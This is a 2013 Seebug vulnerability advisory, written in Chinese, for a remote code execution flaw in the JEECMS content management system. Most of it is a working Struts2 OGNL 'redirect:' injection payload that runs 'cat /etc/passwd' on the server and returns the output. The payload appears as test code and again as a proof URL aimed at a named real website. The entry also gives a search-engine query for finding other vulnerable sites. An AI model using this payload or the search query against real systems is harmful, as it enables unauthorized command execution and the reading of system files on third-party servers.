JEECMS网站内容管理系统远程代码执行漏洞

2013-07-26T00:00:00
ID SSV:94826
Type seebug
Reporter Root
Modified 2013-07-26T00:00:00

Description

简要描述:

JEECMS网站内容管理系统存在新的远程代码执行漏洞

详细说明:

JEECMS网站内容管理系统存在新的远程代码执行漏洞 测试代码:?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}

漏洞证明:

http://www.dlbc.org.cn/login/Jeecms.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}

<img src="https://images.seebug.org/upload/201307/261514171bcfab9ce17f67cc7a6e2fbf7cf5a892.png" alt="1.PNG" width="600" onerror="javascript:errimg(this);">

直接

inurl:Jeecms.do

<img src="https://images.seebug.org/upload/201307/261519085ed17373115f9e98e3860f24563f5f30.png" alt="2.PNG" width="600" onerror="javascript:errimg(this);">